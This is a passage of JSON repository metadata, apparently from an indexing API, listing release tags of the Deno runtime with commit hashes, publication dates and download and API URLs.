:"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","down